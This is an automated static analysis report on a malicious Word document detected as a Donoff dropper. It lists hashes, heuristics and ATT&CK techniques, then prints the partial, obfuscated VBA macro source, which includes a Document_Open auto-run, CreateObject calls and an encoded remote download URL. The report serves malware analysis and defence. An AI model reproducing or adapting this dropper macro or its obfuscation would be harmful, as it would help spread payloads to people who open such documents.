Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc0fbe8e53317332…

MALICIOUS

Office (OLE)

Size: 103.5 KB
Created: 2016-05-31 21:52:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: e58d73b19f4f7d2853b0481bf27de008
SHA-1: 5ef52238710fb4d58e566613530823881134dfdf
SHA-256: fc0fbe8e5331733273a6bc09d8b58c0613300e0ff9fc48543f8dd573ef340275
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. The ClamAV detection name 'Doc.Dropper.Donoff-5743527-0' strongly suggests its function as a dropper for other malware. The VBA script is heavily obfuscated, but its structure and the heuristic firings confirm its malicious intent to download and execute a payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19328 bytes
SHA-256: e59402e058f17a2490d064bbd8664bbb1f417f3d8febce34afee93ff4fdee47d
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub FglkJe(ByVal dKbDfhdPxm As String, ByVal eDyzqTFh As Integer)
duFvgyGLvAiX True, "3M4QzRH7cvc4tfKPR", 9044
KvLItshrUAtfU "WZpGGksufouOBhpcx4gstEAJt72Z2TJXx", "HxKVoQrb74ybQRU7b"
rPYNNhgzRths
bpMPb = 6741
If txVsQLajuHZ("zJyAl7OD7hoNqIaXns8uL137lvOYTR", 886, 440) Then
nqBWmQx = 9024
DQVYa
FDEThcufga 1883
vOvunB = 3192
jqxgrV "oHycHtSvfKMQs74JSzMeGAIsPlN4Z426H"
GWGirdwEjLgUSV = "n5VEAQiBLojRpQVkhz7"
Else
MiPKXMW 653, 5024, 4694
zcuVJ "vSiwakLGjNJeMFMPHoDpPJpifnJuVVG", 9258
oDeQHIThrOqgus
YwfxT = False
End If
End Sub
Private Sub kzhyT(ByVal XwYtGmEyq As Integer)
tMEPTtmgTk "CFSHU8371qufFbcKNI", "0OrgguxhFwvCFKfOKoIQadIuM8jBMakkB", "2quudMXLiQQTWjV7DynGsELmD"
WkALMaHFYgmzB = 358
iAbMVpFFUAvY
lJeFJ = "SDdpNNr9BIgrhzntvQYPGF4ib"
If oIVZgcWzGcDO(True, 55, True) Then
srxJUdSAXotua = 4069
LnSXmAUCKhKIt 555, "GdRjZz0kr63HB07nSF", 2131
AzHNWcyq = "wrHrJRjm2gDSRvwUlDP"
gZsZqh
Else
thFWvVThd
RYnGiKcIspZM 9355
Wrncd = "ptYOzqv5svutDrb85UnlZ9"
End If
End Sub
Private Sub Document_Open()
Dim KRyorhA As Integer
Dim WzkRsNlPO As Boolean
OxXRPkW.hDXtXVa
End Sub

Attribute VB_Name = "OxXRPkW"
Private Sub Lqdksr(ByVal WtRbGmGZzEX As String, ByVal olflBdNgAIe As String)
ldKAeM "eKEzZenNJS04qc2lu"
DrFIcEQi = "rNKN5RIKAeoM3x86jDzJ3iaxO"
NsvPnxy "bbl6nL1V2c6VAaJx1uutPe", "rKdJPbGxisyOrfFmb9eSLa5hUcT", True
End Sub
Private Sub nyMyAjP(ByVal ydENmMsHvpaCoK As Integer, ByVal qOdUAxmAZe As String)
iEVDQ 3110
BOpTlAijpQyoy = 6371
ASNCouqsPiPZ "6xXH1yMR63G4Al6j16wiJp3xt6uP", "8zwcTyf5gLG0VJTUoAIWmOlpr8lp"
AEDSPxlawiNNs = True
dZTfDVECLgbm
End Sub
Private Sub fYFEIGmcIx(ByVal JfzBch As String, ByVal CjYjxRvkZIc As Boolean)
iEpIYnmkp
UFGNwCOBuGRrRI
nVfmqjmOhT
End Sub
Public Function rVHBjbWfheWa(ByVal qPwcjUuCV As String, ByVal AOkvITzTYtpe As String) As Object
Dim aKiXb As Integer
Dim mafCEjNDvc As String
Set rVHBjbWfheWa = aJqseTJ(CreateObject(qPwcjUuCV))
End Function
Public Sub hDXtXVa()
Dim PJoAAeYnbXosc As String
Dim hvMsmacL As Integer
On Error GoTo beFlsNuLXLO
iETIhSiqsUzM.pTabca
iETIhSiqsUzM.bLATonaG
lXsWBpQSVnwlSo
Exit Sub
beFlsNuLXLO:
End Sub
Private Sub hXxZDfg(ByVal oKWSuBa As String)
xDiUyVi = "vn9GXjTcaOQlT5tL4exHEa5n"
If xWxeOExKHSxnwQ Then
VYBwGVdSxrm False, "OcWagph4cTGgy2JVC2qmzhJSLzBCt9b"
ghkCBqoxzNfu
XTsEfiDrBR True
Else
XZUDa 2123
End If
TOJmzGxRrAIb "girjHFDe2uk2XbcuY1", 972
End Sub
Private Function aJqseTJ(ByVal dCVmFC As Object) As Object
Dim sqpUIRaYASVzW As Integer
Set aJqseTJ = dCVmFC
End Function
Private Sub YYhfh(ByVal tfKmiGuac As String, ByVal tHEkErKkaI As String, ByVal RuBgK As String)
Set OnIhiNW = IVLhPqfAc.zRwFEon(True, RuBgK)
IVLhPqfAc.uEVvW wyCVXJHf, 2670, "5PfNIFcGdApLMx0hc", OnIhiNW
EVviFiQJUnxO.UrzHvEsGLBsfwh WzGwYmEpG.rWXKssObshMAsG(fRUgghOHQON, OnIhiNW, 8879), False, "ug2SdwA1GSbqNhL8ACyEfBNIOUo5", tfKmiGuac
End Sub
Private Sub lXsWBpQSVnwlSo()
Dim Fwjaaere As Boolean
YYhfh EVviFiQJUnxO.FlXSJM, "8B95HZ255W3X0bd0eQoKg5", XhggcqXOZBCo
EVviFiQJUnxO.xDxisHynv False, 618, EVviFiQJUnxO.FlXSJM
End Sub
Private Function wyCVXJHf() As String
wyCVXJHf = xybKKSQbijzVLK.tkmpTElNtK("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function fRUgghOHQON() As String
fRUgghOHQON = xybKKSQbijzVLK.tkmpTElNtK("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function XhggcqXOZBCo() As String
XhggcqXOZBCo = xybKKSQbijzVLK.tkmpTElNtK("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "xybKKSQbijzVLK"
Private Function LTpEppfdJF(ByVal KtaCybtReUgjrG As Integer, ByVal thXoVwfXEsWuT As Integer, ByVal QoNyNfVV As String, ByVal AvbCqQNtuZrC As String) As String
If Not lICItchqi.htczxBQXSk(AvbCqQNtuZrC, Fals
... (truncated)